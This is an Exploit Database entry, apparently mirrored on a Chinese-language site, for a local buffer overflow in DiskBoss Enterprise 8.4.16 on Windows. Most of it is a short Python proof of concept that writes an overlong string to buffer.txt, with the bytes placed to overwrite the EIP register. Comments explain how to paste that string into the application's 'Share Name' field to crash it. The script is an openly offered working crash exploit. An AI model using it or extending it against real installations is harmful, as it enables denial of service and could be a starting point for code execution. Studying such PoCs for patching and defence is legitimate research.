DiskBoss Enterprise 8.4.16 – Local Buffer Overflow (PoC)

• Exploit Database
• 17 阅读

• 作者： Touhid M.Shaikh
  日期： 2017-09-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42917/

• #!/usr/bin/python
  
  #========================================================================================================================
  # Exploit Author: Touhid M.Shaikh
  # Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC)
  # Date: 28-09-2017
  # Website: www.touhidshaikh.com
  # Vulnerable Software: DiskBoss Enterprise v8.4.16
  # Vendor Homepage: http://www.diskboss.com
  # Version: v8.4.16
  # Software Link: http://www.diskboss.com/downloads.html
  # Tested On: Windows 7 x86
  #
  #
  # To reproduce the exploit:
  # 1. Click Server
  # 2. Click Connect
  # 3. In the "Share Name" field, paste the content of buffer.txt , And try
  to connect.........BOOoom....
  #
  #========================================================================================================================
  
  
  junk = "A"*1312
  
  EIP = "B"*4 #EIP overwritten
  
  b = junk+EIP+"D"*500
  
  f = open('buffer.txt','w')
  f.write(b)
  f.close()